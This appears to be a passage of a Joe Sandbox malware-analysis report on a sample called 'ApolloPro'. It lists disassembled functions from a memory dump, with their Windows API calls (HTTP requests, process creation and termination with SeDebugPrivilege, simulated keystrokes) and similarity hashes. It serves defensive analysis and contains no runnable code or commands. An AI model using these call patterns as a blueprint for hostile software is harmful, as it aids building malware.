                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 006A218A
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 006A219F
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006A21AC
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006A21DC
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 006A2223
                                                                                                • Part of subcall function 006A2B4F: GetLastError.KERNEL32(?,?,006A1EE3,00000000,00000000,00000001), ref: 006A2B64
                                                                                                • Part of subcall function 006A2B4F: SetEvent.KERNEL32(?,?,006A1EE3,00000000,00000000,00000001), ref: 006A2B79
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 2603140658-3916222277
                                                                                              • Opcode ID: c04df0fee142e8451f53890e16f6d112a7bef15830c9d07e2997c342cc230e54
                                                                                              • Instruction ID: 18310f4b2697e1903482fddea150c05d907e07e47c4ec423fa9f41a03b5387e7
                                                                                              • Opcode Fuzzy Hash: c04df0fee142e8451f53890e16f6d112a7bef15830c9d07e2997c342cc230e54
                                                                                              • Instruction Fuzzy Hash: 28418EB1580209BFEB16AF54CC99FFB7BAEEF09354F00411AFA049A241D7719E458FA4
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,006C0980), ref: 006A9412
                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,006C0980), ref: 006A9446
                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006A95C0
                                                                                              • SysFreeString.OLEAUT32(?), ref: 006A95EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                              • String ID:
                                                                                              • API String ID: 560350794-0
                                                                                              • Opcode ID: 0998bf0ae93ab63eb450d63796840e7bd517908df572adbaa4302c6f19a0c6db
                                                                                              • Instruction ID: d7ff79d7cb72e6d6363cb9658d61aeecbbc87c92d27fddad421629249e04fdc5
                                                                                              • Opcode Fuzzy Hash: 0998bf0ae93ab63eb450d63796840e7bd517908df572adbaa4302c6f19a0c6db
                                                                                              • Instruction Fuzzy Hash: C9F1FB71900119EFDF14EF94C884EAEB7BAEF45314F248458F516AB251DB31AE46CFA0
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006AFD9E
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006AFF31
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006AFF55
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006AFF95
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006AFFB7
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006B0133
                                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006B0165
                                                                                              • CloseHandle.KERNEL32(?), ref: 006B0194
                                                                                              • CloseHandle.KERNEL32(?), ref: 006B020B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4090791747-0
                                                                                              • Opcode ID: 4e7573158e9ed3364ad7bbe3d1ef79c7526d3b460b764f15084b84d1a541e760
                                                                                              • Instruction ID: ef993d90bb86dc363c45d106e465e50975e71a3a1a39987e9f5550992714c988
                                                                                              • Opcode Fuzzy Hash: 4e7573158e9ed3364ad7bbe3d1ef79c7526d3b460b764f15084b84d1a541e760
                                                                                              • Instruction Fuzzy Hash: 1FE1AF712043419FD764EF24C891BAABBE6AF85310F14856DF8899B3A2CB31EC45CB56
                                                                                              APIs
                                                                                                • Part of subcall function 00694BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00693B8A,?), ref: 00694BE0
                                                                                                • Part of subcall function 00694BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00693B8A,?), ref: 00694BF9
                                                                                                • Part of subcall function 00694FEC: GetFileAttributesW.KERNEL32(?,00693BFE), ref: 00694FED
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 006952FB
                                                                                              • _wcscmp.LIBCMT ref: 00695315
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00695330
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 793581249-0
                                                                                              • Opcode ID: f1ceeb4ab018cf370081d2f453929a2215de2845e532aa480a5ae778ea4a6ddb
                                                                                              • Instruction ID: e2a217cbfc3bde8c571df1b5ef70ab16d1c9b406fdcfbb835dca4b8384ac8ff0
                                                                                              • Opcode Fuzzy Hash: f1ceeb4ab018cf370081d2f453929a2215de2845e532aa480a5ae778ea4a6ddb
                                                                                              • Instruction Fuzzy Hash: 545183B24083859BCB65DBA0DC81DDFB3EDAF85301F10091EB58AD3552EF34A689875A
                                                                                              APIs
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006B8D24
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 634782764-0
                                                                                              • Opcode ID: 0ebf3422bbe00fd03af0720c72b901bbe06d05421b257c344a9e4613db6b92a3
                                                                                              • Instruction ID: 300c667bad65febcabeaf5dacc223046023d3ce23a2ed960ee9c1e0a952e4c8e
                                                                                              • Opcode Fuzzy Hash: 0ebf3422bbe00fd03af0720c72b901bbe06d05421b257c344a9e4613db6b92a3
                                                                                              • Instruction Fuzzy Hash: 71518FB0640204BFEB649F28CC89BE97B6BAF05350F244516F614E72E2CB71E9D1DB54
                                                                                              APIs
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0066C638
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0066C65A
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0066C672
                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0066C690
                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0066C6B1
                                                                                              • DestroyIcon.USER32(00000000), ref: 0066C6C0
                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0066C6DD
                                                                                              • DestroyIcon.USER32(?), ref: 0066C6EC
                                                                                                • Part of subcall function 006BAAD4: DeleteObject.GDI32(00000000), ref: 006BAB0D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                              • String ID:
                                                                                              • API String ID: 2819616528-0
                                                                                              • Opcode ID: 8a75d44234edc7f69f49d08ea9e128d731359f9a6f4a5c83e5e16f7665071057
                                                                                              • Instruction ID: 78723097f1b8f41811b1904e3706f8c747c3ee877d69e16b6a488ff837c653a4
                                                                                              • Opcode Fuzzy Hash: 8a75d44234edc7f69f49d08ea9e128d731359f9a6f4a5c83e5e16f7665071057
                                                                                              • Instruction Fuzzy Hash: 1551677064060AEFDB24DF25CC55FBA7BB6EB48720F10452CF952D7290DB70A891DBA4
                                                                                              APIs
                                                                                                • Part of subcall function 0068B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0068B54D
                                                                                                • Part of subcall function 0068B52D: GetCurrentThreadId.KERNEL32 ref: 0068B554
                                                                                                • Part of subcall function 0068B52D: AttachThreadInput.USER32(00000000,?,0068A23B,?,00000001), ref: 0068B55B
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0068A246
                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0068A263
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0068A266
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0068A26F
                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0068A28D
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0068A290
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0068A299
                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0068A2B0
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0068A2B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2014098862-0
                                                                                              • Opcode ID: 9080cb5a42825d60e135148fb310dde3581d72d436f3cef02aa35c78f4018af7
                                                                                              • Instruction ID: 77c4b06219d9ec0e0a7b046a8bba0c32c13a83ad1ccb8f91452cdfec8962d087
                                                                                              • Opcode Fuzzy Hash: 9080cb5a42825d60e135148fb310dde3581d72d436f3cef02aa35c78f4018af7
                                                                                              • Instruction Fuzzy Hash: 6411CEB1950218BEF7206FA5DC8AF7A7A2EEB4C750F112519F6406B090CAF35C509BA4
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0068915A,00000B00,?,?), ref: 006894E2
                                                                                              • HeapAlloc.KERNEL32(00000000,?,0068915A,00000B00,?,?), ref: 006894E9
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0068915A,00000B00,?,?), ref: 006894FE
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0068915A,00000B00,?,?), ref: 00689506
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,0068915A,00000B00,?,?), ref: 00689509
                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0068915A,00000B00,?,?), ref: 00689519
                                                                                              • GetCurrentProcess.KERNEL32(0068915A,00000000,?,0068915A,00000B00,?,?), ref: 00689521
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,0068915A,00000B00,?,?), ref: 00689524
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0068954A,00000000,00000000,00000000), ref: 0068953E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: b29a1d5088f01057c4bbc9031a3a3af03a00a5f9e7de73359a12e06068982f97
                                                                                              • Instruction ID: c1d195d3a2b5afee3d7ad1042e3d7eee9a4baa25c91440f7e797770fc8351c9b
                                                                                              • Opcode Fuzzy Hash: b29a1d5088f01057c4bbc9031a3a3af03a00a5f9e7de73359a12e06068982f97
                                                                                              • Instruction Fuzzy Hash: 0B01B6B5240308FFF710ABA5DC4DF6B7BADEB89711F059411FA05DB2A1CA749800CB20
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                              • API String ID: 0-572801152
                                                                                              • Opcode ID: a385a5829f6e604eef18f7b55339d230e1bc96766684ed5c618c9e94558c8ecf
                                                                                              • Instruction ID: 00a0222ace0f4fa04ee3abd4c5756d1880f3e8268965f498ae5b5b934621b28a
                                                                                              • Opcode Fuzzy Hash: a385a5829f6e604eef18f7b55339d230e1bc96766684ed5c618c9e94558c8ecf
                                                                                              • Instruction Fuzzy Hash: 1EC17F71A0021A9BDF14EFA8C884AEEB7F6FB49314F14856AE905AB380E7709D45CF51
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                              • API String ID: 2862541840-625585964
                                                                                              • Opcode ID: 79c4ad176a1446544b14e7b7dbc18d8ee68d24fbd9d6c19913a299b4697106b7
                                                                                              • Instruction ID: 2bf398631e70b07febc5da9b0cb349563518058502e78f727918e3326f5f16fd
                                                                                              • Opcode Fuzzy Hash: 79c4ad176a1446544b14e7b7dbc18d8ee68d24fbd9d6c19913a299b4697106b7
                                                                                              • Instruction Fuzzy Hash: 2D917B30A00219ABDF24EFA5C844FAFBBBAEF46710F24855EE515AB241D7709D45CFA0
                                                                                              APIs
                                                                                                • Part of subcall function 00687D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?,?,00688073), ref: 00687D45
                                                                                                • Part of subcall function 00687D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?), ref: 00687D60
                                                                                                • Part of subcall function 00687D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?), ref: 00687D6E
                                                                                                • Part of subcall function 00687D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?), ref: 00687D7E
                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 006A9EF0
                                                                                              • _memset.LIBCMT ref: 006A9EFD
                                                                                              • _memset.LIBCMT ref: 006AA040
                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 006AA06C
                                                                                              • CoTaskMemFree.OLE32(?), ref: 006AA077
                                                                                              Strings
                                                                                              • NULL Pointer assignment, xrefs: 006AA0C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                              • String ID: NULL Pointer assignment
                                                                                              • API String ID: 1300414916-2785691316
                                                                                              • Opcode ID: d0647ddc73fa66e8b9967cd272ade0829e272f7c28016237446930fbfeda3b28
                                                                                              • Instruction ID: c653126da82a4d6be332f4bcb2ec4b2bb6018f791df9bcb78eaea699ab42cad1
                                                                                              • Opcode Fuzzy Hash: d0647ddc73fa66e8b9967cd272ade0829e272f7c28016237446930fbfeda3b28
                                                                                              • Instruction Fuzzy Hash: 8C912971D00229EBDB20EFA4DC95EDEBBBAEF09310F20815AF515A7241DB715A45CFA0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006B7449
                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 006B745D
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006B7477
                                                                                              • _wcscat.LIBCMT ref: 006B74D2
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 006B74E9
                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006B7517
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                              • String ID: SysListView32
                                                                                              • API String ID: 307300125-78025650
                                                                                              • Opcode ID: d9b5004c8ba7863bda0b04ca2ba8b56f3a3f18791e9505b46bef1ef3185f7724
                                                                                              • Instruction ID: 4e9415c2a5eded76c49263a62e0cdb32f5be797171fec14a58f9a277731ed022
                                                                                              • Opcode Fuzzy Hash: d9b5004c8ba7863bda0b04ca2ba8b56f3a3f18791e9505b46bef1ef3185f7724
                                                                                              • Instruction Fuzzy Hash: F64193B1A04348AFEB219F64CC85FEE7BEAEF48350F10452AF985A7291D6719D84CB50
                                                                                              APIs
                                                                                                • Part of subcall function 00694148: CreateToolhelp32Snapshot.KERNEL32 ref: 0069416D
                                                                                                • Part of subcall function 00694148: Process32FirstW.KERNEL32(00000000,?), ref: 0069417B
                                                                                                • Part of subcall function 00694148: CloseHandle.KERNELBASE(00000000), ref: 00694245
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006AF08D
                                                                                              • GetLastError.KERNEL32 ref: 006AF0A0
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006AF0CF
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 006AF14C
                                                                                              • GetLastError.KERNEL32(00000000), ref: 006AF157
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 006AF18C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 2533919879-2896544425
                                                                                              • Opcode ID: f3a7113129b45a2dabf6c296089bf8d18a2944f39e6110df6bc2b91788fd9814
                                                                                              • Instruction ID: f662c494f231955febe3cbb7f18ff1893872f02cb99f47c301b07c85ba8ae336
                                                                                              • Opcode Fuzzy Hash: f3a7113129b45a2dabf6c296089bf8d18a2944f39e6110df6bc2b91788fd9814
                                                                                              • Instruction Fuzzy Hash: 4341B9302002019FDB21EF64CC95FADB7A6AF84714F18841CF8468B392DBB4AC05CF9A
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00694802
                                                                                              • LoadStringW.USER32(00000000), ref: 00694809
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0069481F
                                                                                              • LoadStringW.USER32(00000000), ref: 00694826
                                                                                              • _wprintf.LIBCMT ref: 0069484C
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0069486A
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00694847
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 3648134473-3128320259
